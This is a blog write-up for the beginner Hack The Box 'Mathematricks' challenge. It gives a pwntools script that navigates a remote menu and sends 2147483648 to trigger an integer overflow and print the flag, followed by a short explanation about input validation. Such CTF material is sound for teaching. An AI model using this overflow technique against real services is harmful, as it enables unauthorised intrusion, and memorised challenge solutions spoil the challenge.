Post

HackTheBox Mathematricks Writeup

Posted
By x3ric
1 min read

Explore the basics of cybersecurity in the Mathematricks Challenge on Hack The Box. This very-easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

Proof of Concept (PoC)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

#!/usr/bin/env python3
from pwn import *
import warnings
import os
import sys

def get_process():
    try:
        host, port = sys.argv[1].split(':')
        return remote(host, int(port))
    except IndexError:
        print(f'Usage: python {sys.argv[0]} <ip:port>')
        exit(1)

def exploit_integer_overflow():
    warnings.filterwarnings('ignore')
    context.arch = 'amd64'
    context.log_level = 'critical'
    try:
        r = get_process()
        sla = lambda x, y: r.sendlineafter(x, y)
        sla('🥸 ', '1')
        sla('> ', '2')
        sla('> ', '1')
        sla('> ', '0')
        n1 = '2147483648'
        n2 = '1'
        sla('n1: ', n1)
        sla('n2: ', n2)
        flag = r.recvline_contains(b"HTB").strip().decode()
        print(f'Flag --> {flag}')
    except Exception as e:
        print(f"Error during exploitation: {str(e)}")
        if 'r' in locals():
            r.close()

if __name__ == "__main__":
    exploit_integer_overflow()

Summary

Mathematricks on Hack The Box involves an integer overflow exploit in a beginner-friendly cybersecurity challenge. The provided Python script exploits a vulnerable application by manipulating arithmetic operations to trigger an overflow with the number 2147483648, exploiting the application’s mishandling of large integer values. This demonstrates the necessity of proper input validation in software to prevent vulnerabilities and serves as an educational tool for understanding overflow exploits in programming.

challenge
htb challenge writeup linux pwn
This post is licensed under CC BY 4.0 by the author.